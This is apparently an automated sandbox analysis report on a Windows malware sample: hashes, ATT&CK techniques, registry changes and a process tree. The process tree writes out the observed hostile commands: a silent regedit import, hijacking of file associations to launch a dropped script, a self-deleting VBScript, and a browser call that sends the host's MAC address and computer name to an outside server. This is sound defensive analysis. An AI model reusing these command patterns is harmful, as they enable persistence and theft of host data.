599773f20bdf1fb9e692e82714c36355eadf345907bda66cadfcb8e25a0be902

Analysis

max time kernel
135s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
29/08/2024, 17:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
Size

192KB
MD5

c94edec63a3c932df38e954b961b11f8
SHA1

f868c1d8ef4f9bd03857146f900a00262b8cbf9a
SHA256

599773f20bdf1fb9e692e82714c36355eadf345907bda66cadfcb8e25a0be902
SHA512

234ae37a9650889a80e4815025bca9978e000c984397420bd3cc2f6aa6c842bcd487e74721f3845562e7a2f9952bba9de0a75d32a85983d5cb3eeb494f1d9a0b
SSDEEP

3072:f0ENLX2tm4mjyIO+kIHrErlOBUY/PNAh:fMIO+NrsM

Score

7^/10

discovery upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe

Deletes itself 1 IoCs

pid	Process
1880	wscript.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3924-0-0x0000000000400000-0x0000000000431000-memory.dmp	upx
behavioral2/memory/3924-36-0x0000000000400000-0x0000000000431000-memory.dmp	upx

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\tk.reg	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
File opened for modification	C:\Program Files\tohorbigs.rggyg	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
File created	C:\Program Files\1_tohorbigs.rggyg	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
File created	C:\Program Files\2_tohorbigs.rggyg	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
File opened for modification	C:\Program Files\pack.wsf	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
File opened for modification	C:\Program Files\tohorbigs.rggyg	Cmd.exe
File created	C:\Program Files\READ.TXT	WScript.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\My.ini	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe

Modifies Internet Explorer settings 1 TTPs 41 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A3B0E8B4-662E-11EF-98CC-C61537EC8B44} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2016249855"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039570b57fe416e4dbccca910bc3eabbd00000000020000000000106600000001000020000000b83539272a8fa35f39c4a9171224bdff17eaf40158a04625caf2357db86772b7000000000e80000000020000200000005cb94129f06b986f2e0cdb9feac2f85e40b39ae9483c73de77916e47d1e5be2120000000c2558896590de06abb8e60cb291d0453c0060dc34ae239e5ebab3227fe62e99940000000856270acca08cfa9687e313179b9634eeae48551dc329cba56355300c561fd9f1f97cdc3612c54deba8db851ac56f72626f5d6c94eaf1f1d16b538812d43198f	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31128123"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2047499780"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31128123"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31128123"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2013436944"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2013436944"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 000bd9683bfada01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31128123"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "431718572"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\ = "open"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\ = "????"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers\	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\IntroText = "Internet Explorer"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.rggyg\ = "tkfile"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\DropHandler	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\NeverShowExt	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Ink\ = "Inkfile"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\Command\ = "C:\\Windows\\SysWow64\\CScript.exe \"%1\" %*"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "JScript Script File"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\PropertySheetHandlers\WSHProps\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\IntroText = "Internet Explorer"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command\ = "WScript.exe \"C:\\Program Files\\tohorbigs.rggyg\" \"%1\""	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers\WSHProps	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\IntroText = "Internet Explorer"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\CLSID	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "Open"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "C:\\Windows\\SysWow64\\WScript.exe,3"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\NeverShowExt	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Edit\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe %1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	WScript.exe

Runs .reg file with regedit 1 IoCs

pid	Process
3044	regedit.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1408	iexplore.exe
1408	iexplore.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
1408	iexplore.exe
1408	iexplore.exe
2256	IEXPLORE.EXE
2256	IEXPLORE.EXE
1408	iexplore.exe
1408	iexplore.exe
3472	IEXPLORE.EXE
3472	IEXPLORE.EXE
3472	IEXPLORE.EXE
3472	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3924 wrote to memory of 2276	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	84
PID 3924 wrote to memory of 2276	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	84
PID 3924 wrote to memory of 2276	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	84
PID 2276 wrote to memory of 3044	2276	cmd.exe	86
PID 2276 wrote to memory of 3044	2276	cmd.exe	86
PID 2276 wrote to memory of 3044	2276	cmd.exe	86
PID 3924 wrote to memory of 4976	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	91
PID 3924 wrote to memory of 4976	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	91
PID 3924 wrote to memory of 4976	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	91
PID 4976 wrote to memory of 4984	4976	Cmd.exe	93
PID 4976 wrote to memory of 4984	4976	Cmd.exe	93
PID 4976 wrote to memory of 4984	4976	Cmd.exe	93
PID 3924 wrote to memory of 3300	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	98
PID 3924 wrote to memory of 3300	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	98
PID 3924 wrote to memory of 3300	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	98
PID 3300 wrote to memory of 1408	3300	WScript.exe	99
PID 3300 wrote to memory of 1408	3300	WScript.exe	99
PID 1408 wrote to memory of 2256	1408	iexplore.exe	101
PID 1408 wrote to memory of 2256	1408	iexplore.exe	101
PID 1408 wrote to memory of 2256	1408	iexplore.exe	101
PID 3924 wrote to memory of 3004	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	103
PID 3924 wrote to memory of 3004	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	103
PID 3924 wrote to memory of 1880	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	104
PID 3924 wrote to memory of 1880	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	104
PID 3924 wrote to memory of 1880	3924	c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe	104
PID 1408 wrote to memory of 3472	1408	iexplore.exe	105
PID 1408 wrote to memory of 3472	1408	iexplore.exe	105
PID 1408 wrote to memory of 3472	1408	iexplore.exe	105

C:\Users\Admin\AppData\Local\Temp\c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3924
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "C:\Program Files\Common Files\tk.reg"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Runs .reg file with regedit
    PID:3044
- C:\Windows\SysWOW64\Cmd.exe
  Cmd.exe /c CScript /nologo "C:\Program Files\pack.wsf" "C:\Program Files\1_tohorbigs.rggyg" >> "C:\Program Files\tohorbigs.rggyg"
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4976
- - C:\Windows\SysWOW64\cscript.exe
    CScript /nologo "C:\Program Files\pack.wsf" "C:\Program Files\1_tohorbigs.rggyg"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4984
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\SysWow64\WScript.exe" "C:\Program Files\tohorbigs.rggyg"
  2⤵
  - Checks computer location settings
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://www.58lala.com/?bymf
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1408
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1408 CREDAT:17410 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2256
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1408 CREDAT:17416 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3472
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=C6:15:37:EC:8B:44&a_cpname=ERHQJVYQ&a_user=bymf&a_locip=0.0.0.0
  2⤵
  - Modifies Internet Explorer settings
  PID:3004
- \??\c:\windows\SysWOW64\wscript.exe
  c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:1880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\1_tohorbigs.rggyg

Filesize
51KB

MD5
7142e8eb9a1588667b8b94731ab5e9af

SHA1
02c4c0df4225b33018ba36d9849a29cdbc44488d

SHA256
6467dea012dfc5e38c92871ead5e4a358a67e8cca9d68a177a75cb656c79c9ec

SHA512
941c50a05c5ad095e3dc775348a0c25d94128092f4e59ede9e77b5745edbc69d354a0f91f68e6f265b4ec086f0b07bf7e654aed0512f504cc49c2e5b372086af

Download Submit
C:\Program Files\Common Files\tk.reg

Filesize
4KB

MD5
7b121bf5d767794b6610c95f06e29a04

SHA1
d4693b170eda37adc7cbc68b64b23513d53d1e7d

SHA256
47e0457dc038bf82e839ed8d775ae718bd815a2095ad35598b23a1b210b51a60

SHA512
f65f49d6d798cb05afe821f98bf1aa49c3dc4269325200abe5e02dbd1a55ca90ebea4cccc08e745767b6fd853a9696bc5055fa89a2973014c66ddd1118cc2d5e

Download Submit
C:\Program Files\pack.wsf

Filesize
8KB

MD5
a83fdf4f29a7e978d33eeb3674df531b

SHA1
60ea7b41816bc2044a6224e38352e56667d3d5ed

SHA256
f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845

SHA512
